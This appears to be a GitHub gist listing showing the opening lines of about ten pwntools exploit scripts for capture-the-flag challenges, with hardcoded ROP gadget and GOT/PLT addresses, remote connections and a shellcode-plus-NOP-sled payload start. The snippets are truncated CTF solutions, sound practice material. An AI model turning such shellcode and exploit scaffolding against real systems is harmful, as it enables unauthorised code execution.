This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/python | |
from pwn import * | |
from littlepwny import * | |
#con = remote(sys.argv[1],int(sys.argv[2])) | |
con = process("./START") | |
shellcode = Scode("x64") | |
readplt = 0x0000000000400400 |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/python | |
# 72: 0804857b 128 FUNC GLOBAL DEFAULT 13 print_flag | |
from pwn import * | |
import sys | |
#con = process("./overflow") | |
con = remote(sys.argv[1],sys.argv[2]) |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/python | |
from pwn import * | |
import time | |
pop2ret = 0x8048b84 | |
pop4ret = 0x8048eec | |
sendGOT = 0x0804b064 | |
sendPLT = 0x08048700 |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/python | |
#MCSC CTF 2016: Randmizi | |
#Category : PWN | |
#Points : 200 | |
#Exploit : Abdeljalil Nouiri | |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/python | |
#author : Abdeljalil Nouiri | |
from pwn import * | |
context.arch= "amd64" | |
context.os = "linux" |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/python | |
#Author : Abdeljalil Nouiri | |
#exploit For LSE EPITA CTF : Smash Stack 100pts | |
from pwn import * | |
import sys | |
cmd = 0x8049dc8 |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/python | |
#Author : Abdeljalil Nouiri | |
#exploit For LSE EPITA CTF : Tiny Panel 50 pts | |
from pwn import * | |
import sys | |
username = "admin" |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/python | |
from pwn import * | |
#Author : Abdeljalil Nouiri | |
# Xiorama CTF - PWN 200 Mint | |
""" | |
#LOCAL | |
sysoff = 0x00040310 |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/python | |
#OWASPCTF 2017 | |
#sandboxed exploit Code | |
import itertools,string,hashlib | |
import time,sys | |
from pwn import * |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
from pwn import * | |
jmp2heap = 0x804a008 | |
SC = asm(shellcraft.sh()) | |
def pwny(s,addr,shellcode): | |
payload = "" | |
payload += shellcode | |
payload += "\x90"*35 |